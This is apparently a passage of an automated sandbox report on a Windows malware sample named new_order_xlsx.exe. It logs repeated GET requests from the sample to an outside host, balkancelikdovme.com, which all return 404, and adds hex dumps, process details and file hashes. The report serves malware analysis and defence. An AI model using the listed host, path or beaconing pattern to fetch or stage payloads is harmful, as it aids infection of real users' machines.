                      2023-09-04 14:25:18 UTC28INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      23192.168.2.449733185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:19 UTC29OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:19 UTC29INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:19 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:19 UTC30INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      24192.168.2.449734185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:20 UTC30OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:20 UTC31INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:20 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:20 UTC31INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      25192.168.2.449735185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:20 UTC32OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:20 UTC32INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:20 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:20 UTC32INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      26192.168.2.449736185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:21 UTC33OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:21 UTC33INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:21 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:21 UTC33INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.449711185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:07 UTC3OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:07 UTC4INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:07 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:07 UTC4INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.449712185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:08 UTC5OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:08 UTC5INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:08 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:08 UTC5INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      5192.168.2.449713185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:08 UTC6OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:08 UTC6INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:08 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:08 UTC7INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      6192.168.2.449714185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:09 UTC7OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:09 UTC7INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:09 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:09 UTC8INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      7192.168.2.449715185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:09 UTC8OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:09 UTC9INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:09 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:09 UTC9INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      8192.168.2.449716185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:10 UTC10OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:10 UTC10INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:10 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:10 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      9192.168.2.449717185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:10 UTC11OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:10 UTC11INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:10 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:10 UTC12INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:16:25:01
                      Start date:04/09/2023
                      Path:C:\Users\user\Desktop\new_order_xlsx.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\new_order_xlsx.exe
                      Imagebase:0x400000
                      File size:1'516'544 bytes
                      MD5 hash:EF6025979E7E27041EF72650FDBE8630
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Reputation:low
                      Has exited:true

                      Target ID:4
                      Start time:16:25:21
                      Start date:04/09/2023
                      Path:C:\Windows\SysWOW64\WerFault.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1132
                      Imagebase:0x970000
                      File size:434'592 bytes
                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Reset < >
                        Memory Dump Source
                        • Source File: 00000000.00000003.230000806.0000000003500000.00000004.00001000.00020000.00000000.sdmp, Offset: 034F4000, based on PE: false
